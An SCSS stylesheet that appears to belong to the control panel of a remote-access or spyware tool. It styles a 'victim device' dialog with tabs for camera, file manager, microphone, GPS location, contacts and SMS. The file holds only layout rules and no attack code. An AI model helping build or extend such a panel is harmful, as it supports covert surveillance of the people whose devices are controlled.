div.fui-DialogSurface.victim-device-modal {
    width: 90vw;
    max-width: unset;
    height: 90dvh;
    > div.fui-DialogBody {
        height: 100%;
        max-height: 100%;
        overflow: hidden;

        > div.fui-DialogContent {
            display: flex;
            flex-direction: column;
            overflow: hidden;

            div.custom-tab-content {
                flex: 1;
                display: flex;
                flex-direction: column;
                overflow: hidden;
                padding-top: 1em;

                &.camera {
                    gap: 1em;

                    > div.camera-controls {
                        align-items: center;
                        display: flex;
                        justify-content: center;
                        gap: 1em;
                    }

                    > div.camera-preview {
                        flex: 1;
                        overflow: hidden;

                        > img {
                            width: 100%;
                            height: 100%;
                            object-fit: contain;
                            background-color: var(--colorNeutralBackground6);
                        }
                    }
                }

                &.file-manager {
                    > div.file-table-container {
                        flex: 1;
                        overflow: auto;

                        > table {
                            width: 100%;
                            border-collapse: collapse;
                            font-size: 1.2em;

                            > colgroup {
                                > col {
                                    &:first-child {
                                        width: 2em;
                                    }
                                }
                            }

                            > tbody {
                                > tr {
                                    cursor: pointer;

                                    &:nth-child(even) {
                                        background-color: var(
                                            --colorNeutralBackground6
                                        );
                                    }
                                }
                            }
                        }
                    }
                }

                &.microphone {
                    > div.microphone-controls {
                        align-items: center;
                        display: flex;
                        gap: 0.5em;
                        justify-content: center;

                        > span.fui-Input {
                            > input {
                                text-align: right;
                            }
                        }
                    }

                    > div.microphone-preview {
                        flex: 1;
                        overflow: hidden;
                        align-items: center;
                        display: flex;
                        flex-direction: column;
                        justify-content: center;
                        gap: 1em;

                        > div.wave-audio-player {
                            height: 30vh;
                            width: 50vw;
                            min-width: 30em;

                            display: flex;
                            flex-direction: column;
                            gap: 3em;

                            > div.wave-container {
                                flex: 1;
                            }

                            > audio {
                                width: 80%;
                                min-height: 4em;
                                align-self: center;
                            }
                        }
                    }
                }

                &.location {
                    > div.leaflet-container {
                        flex: 1;
                    }
                }

                &.contacts {
                    > div.contact-controls {
                        align-items: center;
                        display: flex;
                        justify-content: space-between;
                        margin-bottom: 1em;
                    }

                    > div.contacts-list {
                        flex: 1;
                        overflow: auto;
                        display: grid;
                        grid-template-columns: repeat(
                            auto-fill,
                            minmax(15em, 1fr)
                        );
                        gap: 1em;

                        > div.contact-card {
                            display: flex;
                            flex-direction: column;
                            gap: 0.5em;
                            padding: 1em;
                            border-radius: 0.5em;
                            border: 0.1em solid var(--colorNeutralBackground6);
                            cursor: pointer;
                            height: fit-content;

                            > div {
                                overflow: hidden;
                                white-space: nowrap;
                                text-overflow: ellipsis;

                                &.contact-name {
                                    font-weight: bold;
                                }

                                &.contact-phone {
                                    font-size: 0.8em;
                                }
                            }
                        }
                    }
                }

                &.sms {
                    padding-top: 0;

                    > div.custom-tab-content {
                        padding: 1em 1em 0 1em;

                        &.send-sms {
                            gap: 1em;

                            > div.fui-Field.message {
                                flex: 1;

                                grid-template-rows: auto 1fr;
                            }
                        }

                        &.view-sms {
                            > div.sms-controls {
                                align-items: center;
                                display: flex;
                                justify-content: space-between;
                                margin-bottom: 1em;
                            }

                            > div.sms-messages {
                                display: grid;
                                grid-template-columns: repeat(
                                    auto-fill,
                                    minmax(20em, 1fr)
                                );
                                gap: 1em;
                                overflow: auto;

                                > div.sms-card {
                                    display: flex;
                                    border-radius: var(--borderRadiusMedium);
                                    border: 0.1em solid
                                        var(--colorNeutralBackground6);
                                    padding: 1em;
                                    gap: 1em;

                                    > div.sms-content {
                                        flex: 1;
                                        overflow: hidden;
                                        display: flex;
                                        flex-direction: column;

                                        > div {
                                            overflow: hidden;

                                            &.sender {
                                                font-weight: bold;
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}
